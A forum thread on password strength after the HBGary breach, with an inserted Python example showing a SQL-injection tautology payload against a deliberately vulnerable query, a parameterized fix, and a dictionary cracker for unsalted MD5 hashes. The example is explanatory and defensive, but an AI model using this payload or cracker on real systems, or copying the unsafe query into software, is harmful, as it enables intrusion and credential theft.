
Instantly Increasing Password Strength


Stoic Joker:
Anything else done to reduce the complexity or length in order to make it more suitable for human use will reduce the level of security.
--- End quote ---

Not necessarily. As I suggested before in another thread, three way login forms can be very powerful.

You can't mass brute-force a photo upload for an image captcha unless you have access to the home storage file already, but even then you have to know each user's specific thought process and which personal photo they are using to access something. -Paul Keith (February 24, 2011, 09:36 AM)
--- End quote ---

Okay, from a front door perspective only... I'd agree - I find the user, pass, pic, phrase logons much less annoying and more effective than captchas, which are easily defeated with OCR. But... that's not what we are (or the thread is) discussing.

The question on the table was regarding the HBGeary fiasco. Where the User Table had already been dumped via SQL injection. So the additional bits of info (pic & phrase) could simply be read from the next column over, and would afford no further resistance.

So the discussion was really focused on how complex a password really needs to be to keep it from being hash cracked in a matter of hours (i.e., it's all straight-up back-door stuff).

Paul Keith:
Well, the thread was twofold. One part was simplified password strength and the other is that situation.

I'd argue, since there's a separate HBGary thread, that the front door perspective is more of a major component of this thread than the HBGary example. (Sorry if it's really HBGeary; I didn't really look into the topics in depth and most of what I read was written as HBGary.)

In that sequence though, does a password really help? Most security relies on the front door being backdoored, not entered through.

It would probably be more secure for HBGary to have deceptive information alongside the real information, to make deciphering the disinformation much harder. In that sense, it's like an encrypted container: get into the OS, but all you can do is delete the files, not view them.

Here, you're viewing the files, but you don't know that you're being convinced to treat the wrong files as legit, and the chance of a whistleblower getting the wrong picture means there's a lower chance someone is going to look again after what has been confirmed. That's the security there, IMO. The password is just useless no matter how complex. You're basically attracting attention to a compromised situation. There's a very low percentage chance that the guys won't figure out the complex password eventually anyway. Obscurity is really your best password, especially if it's obscuring via red herring.

Stoic Joker:
HBGary/HBGeary... I had a feeling I spelt that wrong. :)

Their problem was that the front door had a set of keys left in it... in the form of unvalidated SQL input being allowed to execute against the server. Which is how the table got "dumped". This allowed all of the brute-forcing to be done offline on fast (and distributed) hardware. No more internet connection speed slowing down the number of attempts per second.
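
The two halves of that failure, as an added example (not code from this thread or from the HBGary incident; the user table, password hashes, wordlist and hash rates below are constructed for illustration): a lookup that concatenates user input into SQL and so hands over the whole table, the same lookup with a bound parameter, and then the offline part, a dictionary attack with simple mangling rules against the unsalted MD5 hashes in the dump, plus the back-of-envelope time to exhaust a keyspace once the attacker's own hardware, not the server, sets the guess rate. The "extra" login factor sits in the next column of the same table, which is the point made above about pics and phrases.

```python
import hashlib
import sqlite3

# Constructed sample data, not from any real breach: a small CMS user table
# storing unsalted MD5 hashes, with the extra login factor in the next column.
USERS = [
    ("alice", "kitten12", "alice_dog.jpg"),
    ("bob", "Summer2011", "bob_boat.jpg"),
    ("carol", "q7#Lm!2zP9vX", "carol_cat.jpg"),
]

# Constructed wordlist standing in for a real dictionary file.
WORDLIST = ["password", "kitten", "summer", "letmein"]

# Classic tautology payload; the attacker does not need a valid username.
PAYLOAD = "x' OR '1'='1"


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_db():
    """In-memory SQLite database standing in for the CMS back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT, login_pic TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(name, md5_hex(pw), pic) for name, pw, pic in USERS],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Unvalidated input concatenated into SQL: the keys left in the front door.
    With PAYLOAD the WHERE clause becomes  username = 'x' OR '1'='1'  and every
    row comes back, hash and picture columns included."""
    query = (
        "SELECT username, pw_hash, login_pic FROM users "
        f"WHERE username = '{username}'"
    )
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    """Same lookup with a bound parameter; the payload is now just a username
    nobody has, so nothing is returned."""
    query = "SELECT username, pw_hash, login_pic FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def candidates(wordlist):
    """Dictionary attack with a few mangling rules: word as-is, Capitalised,
    with a two-digit suffix, with a year suffix. Real crackers ship thousands
    of such rules; these few are enough to show why 'kitten12' is not a password."""
    for word in wordlist:
        for base in (word, word.capitalize()):
            yield base
            for n in range(100):
                yield f"{base}{n:02d}"
            for year in range(1990, 2021):
                yield f"{base}{year}"


def crack_md5(pw_hash, wordlist):
    """Offline attack on one unsalted MD5 hash. Returns (plaintext, guesses);
    plaintext is None if the wordlist and rules do not cover it."""
    guesses = 0
    for guess in candidates(wordlist):
        guesses += 1
        if md5_hex(guess) == pw_hash:
            return guess, guesses
    return None, guesses


def crack_dump(rows, wordlist):
    """Run crack_md5 over every row of a dumped user table."""
    return {username: crack_md5(pw_hash, wordlist)[0] for username, pw_hash, _ in rows}


def brute_force_hours(length, alphabet_size, hashes_per_second):
    """Worst-case hours to exhaust a keyspace offline. With the table in hand,
    the limit is the attacker's hardware, not the server's login rate."""
    return alphabet_size ** length / hashes_per_second / 3600


if __name__ == "__main__":
    conn = build_db()
    dumped = lookup_vulnerable(conn, PAYLOAD)
    print("rows via injection:", len(dumped),
          "| via parameterized query:", len(lookup_safe(conn, PAYLOAD)))
    for user, plaintext in crack_dump(dumped, WORDLIST).items():
        print(f"{user}: {plaintext or 'not cracked'}")
    # Assumed hash rate of 1e9/s is a round illustrative figure, not a benchmark.
    print(f"8 chars, lowercase+digits, 1e9 hashes/s: {brute_force_hours(8, 36, 1e9):.2f} h")
    print(f"12 chars, printable ASCII, 1e9 hashes/s: {brute_force_hours(12, 94, 1e9):.2e} h")
```

Run as a script, the injected lookup returns all three rows while the parameterized one returns none; the two dictionary-style passwords fall to about a thousand guesses, the random 12-character one does not. The last two lines are the answer to "how complex does it need to be": an 8-character lowercase-plus-digits keyspace is exhausted in well under an hour at the assumed rate, a 12-character printable-ASCII one takes on the order of 10^11 hours. Salting and a slow hash (bcrypt, scrypt, PBKDF2) change the per-guess cost, but once the table is dumped the only remaining defence is the size of the keyspace times the cost of one guess.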

Paul Keith:
Yeah, that was what I was trying to imply.

I don't know anything about SQL, but I do know one thing: if you leave your keys at the front door, eventually someone's bound to open your vault no matter how complicated the lock is, unless you trick them into thinking the treasure is elsewhere.

Mattphoes:
I use "KeePass" to store my passwords. It also offers to create random passwords with a single click.

What I really hate is that many websites limit the maximum password length.
